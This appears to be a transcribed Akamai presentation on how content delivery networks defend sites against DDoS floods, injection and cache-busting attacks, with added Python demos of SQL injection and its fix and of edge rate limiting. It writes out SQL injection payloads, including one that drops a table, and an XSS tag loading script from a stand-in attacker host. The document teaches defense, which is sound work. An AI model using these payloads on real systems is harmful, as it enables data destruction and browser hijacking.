The Role of Content Delivery Networks in Protecting Web Sites from Attacks
Bruce Maggs
VP for Research, Akamai Technologies

The Akamai Platform and Services
A Global Platform: Delivering 130,000+ Domains
• 175,000+ Servers
• 1,300+ Networks
• 2,500+ Physical Locations
• 650+ Cities
• 100+ Countries
• All top 60 ecommerce sites
• All top 30 media & entertainment companies
• 9 of the top 10 banks
• All of the top Internet portals
Daily Traffic:
• 33+ Tbps peak
• 19+ million hits per second
• 600+ million IPv4 clients/day
• 4+ trillion deliveries/day
• 30+ petabytes/day
• 10+ million concurrent streams
©2013 AKAMAI | FASTER FORWARD™

Distributed Denial of Service (DDoS) Attacks
• The attacker hopes to overwhelm the content provider’s resources with requests for service.
• Sometimes the attacker employs a “bot army” of compromised machines.
• The attacker tries to issue requests for content that cannot be cached.
• The attacker looks for “amplification”, where an easy-to-generate request requires a difficult-to-generate response.

Attack Frequency (Attacks Detected and Mitigated)
[bar chart: attacks per year, 2010 through 2014; the five bar values shown, in the order they appear in the chart, are 991, 1317, 2002, 2936 and 5634]

Largest Attacks by Year
[bar chart: largest attack per year, 2005 through 2014, measured in Gbps and Mpps; the 2014 bars read 320 Gbps / 270 Mpps and the 2013 bars 190 Gbps / 144 Mpps; the labels for the earlier years are scattered in the extraction and are not reproduced here]

Attack Types Q3 2014
[pie chart: attack types, Q3 2014; no labels survived extraction]

Attack Origins Q3 2014
• US 23.95%
• China 20.07%
• Brazil 17.60%
• Mexico 14.16%
• Korea 6.13%
• Germany 5.78%
• Japan 4.10%
• Russia 2.97%
• India 2.81%
• Thailand 2.43%

Targeted Industry Sectors
• Gaming 33.67%
• Media & Entertainment 23.65%
• Software & Technology 19.44%
• Financial Services 9.22%
• Internet & Telecom 8.82%
• Education 2.20%
• Public Sector 1.40%
• Health Care & Life Sciences 1.20%
• Business Services 0.20%
• Hotel & Travel 0.20%

Avoid data theft and downtime by extending the security perimeter outside the data center, and protect against the increasing frequency, scale and sophistication of web attacks.

The Akamai Platform Provides a Perimeter Defense
[diagram: End User → Akamai → Origin Server, with a log-scale chart (1 to 10,000) contrasting Akamai Traffic with Origin Traffic]

Defeating HTTP flooding attacks – Rate Controls
1. Count the number of Forward Requests
2. Block any IP address with excessive forward requests
[diagram: Client Request → Akamai Edge Server → Forward Request → Customer Origin → Forward Response; a client whose IP is blocked receives a Custom Error page instead of a forward request]

Filtering Out Malformed Requests
• SQL injection attacks
• Cross-site scripting (XSS) attacks
• Cache busting attacks

Relational databases
Relational databases store tables consisting of rows and columns. (image from http://support.sas.com)

Structured Query Language (SQL)
Example Query:
    SELECT * FROM Employees WHERE LName = 'PARKER';
Result:
    IdNum  LName   FName  JobCode  Salary  Phone
    1354   PARKER  MARY   FA3      65800   914/455-2337

Example SQL Injection
Suppose a program creates the following SQL query, where userName is a variable holding input provided by an end-user, e.g., through a form on a Web page.
    "SELECT * FROM Employees WHERE LName = '" + userName + "';"
But instead of entering a name like PARKER the user enters
    ' or '1'='1
Then the query becomes
    SELECT * FROM Employees WHERE LName = '' or '1'='1';
This query returns all rows in the Employees table!

A More Destructive Injection
Same code as before:
    "SELECT * FROM Employees WHERE LName = '" + userName + "';"
But now suppose the user enters
    a'; DROP TABLE Employees
Then the query becomes
    SELECT * FROM Employees WHERE LName = 'a'; DROP TABLE Employees;
This query might delete the Employees table! (Not all databases allow two queries in the same string.)
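The two injection slides above can be reproduced end to end. The following is an added example, not code from the slides or from Akamai: it builds an in-memory SQLite copy of the Employees table (the rows other than PARKER are constructed for the demo), runs both payloads through the string-concatenation pattern the slides show, and runs the same inputs through a parameterized query, which is the standard fix. The stacked-statement payload also illustrates the slide's caveat that not every database accepts two statements in one string: Python's sqlite3 driver rejects it outright.

```python
"""Added example (not from the slides): the two injection payloads shown on
the slides, run against an in-memory SQLite copy of the Employees table, first
through string concatenation (the vulnerable pattern) and then through a
parameterized query (the fix). Table contents are constructed for the demo."""
import sqlite3

# Constructed sample data; the first row is the slide's example row.
EMPLOYEES = [
    (1354, "PARKER", "MARY", "FA3", 65800, "914/455-2337"),
    (1355, "SMITH", "JOHN", "PT1", 52000, "914/455-1188"),
    (1356, "LEE", "ANNA", "FA2", 61000, "914/455-9020"),
]


def new_db():
    """Fresh in-memory database with the Employees table populated."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Employees (IdNum INTEGER, LName TEXT, FName TEXT, "
        "JobCode TEXT, Salary INTEGER, Phone TEXT)"
    )
    conn.executemany("INSERT INTO Employees VALUES (?, ?, ?, ?, ?, ?)", EMPLOYEES)
    return conn


def lookup_concat(conn, user_name):
    """The vulnerable pattern from the slide: user input spliced into SQL text.
    Returns the LName values of the rows the resulting query selects."""
    query = "SELECT * FROM Employees WHERE LName = '" + user_name + "';"
    return [row[1] for row in conn.execute(query)]


def lookup_param(conn, user_name):
    """The fix: the input is bound as a parameter, so it is only ever compared
    as a string value and is never parsed as SQL."""
    rows = conn.execute("SELECT * FROM Employees WHERE LName = ?", (user_name,))
    return [row[1] for row in rows]


def run_demo():
    """Run both payloads through both code paths and collect the outcomes."""
    conn = new_db()
    results = {}

    # Normal use: both variants return the single PARKER row.
    results["concat_normal"] = lookup_concat(conn, "PARKER")
    results["param_normal"] = lookup_param(conn, "PARKER")

    # Payload 1 from the slides: the always-true clause returns every row
    # when concatenated, and matches nothing when bound as a parameter.
    payload1 = "' or '1'='1"
    results["concat_tautology"] = lookup_concat(conn, payload1)
    results["param_tautology"] = lookup_param(conn, payload1)

    # Payload 2 from the slides: a second statement appended to the query.
    # sqlite3's execute() refuses to run more than one statement (the slide's
    # caveat in action); other drivers and databases may execute both.
    payload2 = "a'; DROP TABLE Employees"
    try:
        lookup_concat(conn, payload2)
        results["concat_drop_rejected"] = False
    except (sqlite3.Warning, sqlite3.Error):
        results["concat_drop_rejected"] = True
    results["param_drop"] = lookup_param(conn, payload2)   # just a no-match lookup

    # The table survives either way in this demo.
    results["table_intact"] = conn.execute("SELECT COUNT(*) FROM Employees").fetchone()[0]
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The parameterized variant is the point of the example: with `?` placeholders the driver sends the query text and the value separately, so a quote in the value can never close the string literal. The driver-level rejection of stacked statements is a property of this particular driver, not a defense to rely on.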
bobby-tables.com: A guide to preventing SQL injection (from the comic strip xkcd)

Cross-Site Scripting
Attacker types this into a text entry form:
    <script src=http://theftsRus.com/script.js></script>
Attacker hopes that later the site will insert this into the HTML that it outputs, and then the victim’s browser will execute the script.

Cache Busting
Attacker adds query strings to the end of a requested URL, e.g.,
    http://ak.xyz.com/logo.gif?id=832164328
Attacker hopes that the CDN will view each request with a different query string as a request for a different object, and fetch a new copy from the content provider.

Operation Ababil
“none of the U.S banks will be safe from our attacks”
Phase 1: Sep 12 – Early Nov 2012
• DNS packets with “AAAAA” payload
• Limited Layer 7 attacks
• Early-mid Oct 2012 announced names of banks where attacks succeeded
• (Did not announce bank names if attacks were unsuccessful)
• Began use of HTTP dynamic content to circumvent static caching defenses
Phase 2: Dec 12, 2012 – Jan 29
• Incorporate random query strings and values
• Addition of random query strings against PDFs
• Additions to bot army
• Burst probes to bypass rate-limiting controls
• Addition of valid argument names, random values
Phase 3: Late Feb 2013 – May 2013
• Multiple probes
• Multiple targets
• Increased focus on Layer 7 attacks
• Target banks where attacks work
• Fraudsters take advantage
Phase 4: July 2013 –
• Used fake plug-ins to infect files

Phase 1 Attack – Sept 2012
[chart: DNS Traffic Handled by Akamai, 0.0 M to 1.8 M packets per second, from Tues 12:00 through Wed 12:00; series: Total, eDNS]
Attack Traffic: 23 Gbps (10,000X normal)
Duration: 4.5 Hours
• High volume of non-standard packets sent to UDP port 53
• Packets did not include a valid DNS header
• Packets consisted of large blocks of repeating “A”s
• The packets were abnormally large
• Simultaneously, a SYN-Flood was directed against TCP port 53

Phase 2 Attacks - January 2nd, 2013
[timeline: Bank #1 through Bank #5]
• QCF targeted PDF files
• Akamai Dynamic Caching Rules offloaded 100% of the traffic
• No Origin Impact

Phase 2 Attacks - January 2nd, 2013
[timeline: Bank #1 through Bank #5]
• QCF targeted marketing web pages
• Rate controls automatically activated
• Attack was deflected, far from bank’s datacenter
• No Origin Impact

Phase 2 Attacks - January 2nd, 2013
[timeline: Bank #1 through Bank #5]
• QCF targeted SSL
• Akamai offloaded 99% of the traffic
• No Origin Impact

Phase 2 Attacks - January 2nd, 2013 (NOT on Akamai)
[timeline: Bank #1 through Bank #5, Gomez agents in 12 cities measuring hourly; times shown: 9:00 AM, 12:03 PM]
• Error/Outage—site not responding

Phase 2 Attacks - January 2nd, 2013 (NOT on Akamai)
[timeline: Bank #1 through Bank #5, Gomez agents in 12 cities measuring hourly; times shown: 12:44 PM, 6:21 PM]
• Error/Outage—site not responding

Phase 3 Attack Example
• Attack started on the morning of March 5, 2013
• Peak Attack Traffic > 126 thousand requests per second
• 70x normal Edge Bandwidth (29 Gbps)
• Origin Traffic stayed at normal levels
• ~2000 Agents participated in the 20 minute assault
• 80% of the agents were new IP addresses that had not participated in earlier campaigns

Attack Tactics - Pre-attack Reconnaissance
Attackers test the site with short burst high speed probes
• Short bursts of attack requests on non-cacheable content every 10 minutes
• Peak of 18 million requests per second
If the site falters, they announce that they will attack that bank and return later with a full scale attack
If the site is resilient they move on

Observations
Due to recent attack sizes, infrastructure capacity build out is not economical, and may not work anyway
• Attacks range from 13X to 70X normal traffic, 25X to 120X normal request volume
The burst speed of attacks has become too fast for reactive mitigation – a proactive “always-on” defense is necessary
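Two of the edge defenses in this deck, the Rate Controls slide (count forward requests per IP, block the IP when the count is excessive) and the response to cache busting and random query strings described on the Cache Busting slide and in the Phase 2 bullets, can be shown together in one small simulation. The following is an added example, not code from the slides or from Akamai, and the request log, the cacheable suffixes, the allow-listed query key, the window length and the forward-request limit are all constructed for the demo. It runs a legitimate visitor, a cache-busting client and a burst-probing client through the same edge logic and reports how many requests each one got to the origin.

```python
"""Added example (not from the slides or Akamai's code): a toy edge server
with (1) a cache key that ignores non-allow-listed query parameters, so
random cache-busting query strings collapse onto one cached object, and
(2) a rate control that counts forward requests per client IP in a sliding
window and blocks the IP once the count exceeds a limit. All inputs are
constructed for the demo."""
from collections import defaultdict, deque
from urllib.parse import urlsplit, parse_qsl, urlencode

# Constructed policy (hypothetical values chosen for the demo).
CACHEABLE_SUFFIXES = (".gif", ".png", ".css", ".js", ".pdf")
ALLOWED_QUERY_KEYS = {"lang"}          # query keys that legitimately vary content
WINDOW_SECONDS = 10                    # sliding window for the rate control
FORWARD_LIMIT = 5                      # forward requests per IP per window


def cache_key(url):
    """Normalize a URL for cache lookup: keep the path, drop every query
    parameter except the allow-listed ones, and sort what remains. Requests
    that differ only in a cache-busting parameter therefore share one key."""
    parts = urlsplit(url)
    kept = sorted((k, v) for k, v in parse_qsl(parts.query) if k in ALLOWED_QUERY_KEYS)
    return parts.path + ("?" + urlencode(kept) if kept else "")


def is_cacheable(url):
    """Static assets are served from cache; everything else is dynamic."""
    return urlsplit(url).path.endswith(CACHEABLE_SUFFIXES)


class EdgeServer:
    """Tracks cached objects and per-IP forward requests in a sliding window."""

    def __init__(self):
        self.cache = set()                   # normalized keys already fetched
        self.forwards = defaultdict(deque)   # ip -> timestamps of forward requests
        self.blocked = set()
        self.origin_requests = 0

    def handle(self, ts, ip, url):
        """Return 'blocked', 'hit' or 'forward' for one request."""
        if ip in self.blocked:
            return "blocked"                 # would be served the custom error page
        key = cache_key(url)
        if is_cacheable(url) and key in self.cache:
            return "hit"
        # Cache miss or dynamic content: this is a forward request to origin.
        self.origin_requests += 1
        if is_cacheable(url):
            self.cache.add(key)
        window = self.forwards[ip]
        window.append(ts)
        while window and window[0] <= ts - WINDOW_SECONDS:
            window.popleft()                 # expire forwards outside the window
        if len(window) > FORWARD_LIMIT:
            self.blocked.add(ip)             # all later requests are blocked
        return "forward"


# Constructed request log: (timestamp in seconds, client IP, URL).
REQUESTS = (
    # Legitimate user: one dynamic page, a few assets, then an asset again.
    [(0, "198.51.100.7", "https://ak.xyz.com/home?lang=en"),
     (1, "198.51.100.7", "https://ak.xyz.com/logo.gif"),
     (2, "198.51.100.7", "https://ak.xyz.com/site.css"),
     (30, "198.51.100.7", "https://ak.xyz.com/logo.gif")]
    # Cache-busting client: the same GIF with a different id each time.
    + [(t, "203.0.113.9", f"https://ak.xyz.com/logo.gif?id={832164328 + t}") for t in range(20)]
    # Burst-probing client: non-cacheable content, 20 requests in one second.
    + [(40, "203.0.113.50", f"https://ak.xyz.com/account/balance?n={t}") for t in range(20)]
)


def run_simulation(requests=REQUESTS):
    """Replay the log in time order; return per-IP outcome counts, the number
    of forward requests that reached origin, and the set of blocked IPs."""
    edge = EdgeServer()
    outcomes = defaultdict(lambda: defaultdict(int))
    for ts, ip, url in sorted(requests):
        outcomes[ip][edge.handle(ts, ip, url)] += 1
    return {ip: dict(c) for ip, c in outcomes.items()}, edge.origin_requests, edge.blocked


if __name__ == "__main__":
    per_ip, origin, blocked = run_simulation()
    for ip, counts in per_ip.items():
        print(ip, counts)
    print("forward requests reaching origin:", origin, "blocked IPs:", sorted(blocked))
```

Two things in the run are worth noting. The cache-busting client's twenty distinct URLs produce exactly one forward request, because the normalized key strips the `id` parameter; without that normalization every one of them would have been a forward request and the client would also have tripped the rate control. And the rate control counts forward requests rather than client requests, as the slide specifies, so a legitimate visitor whose requests are mostly cache hits never approaches the limit, while the probing client is blocked after its sixth forward request within the window.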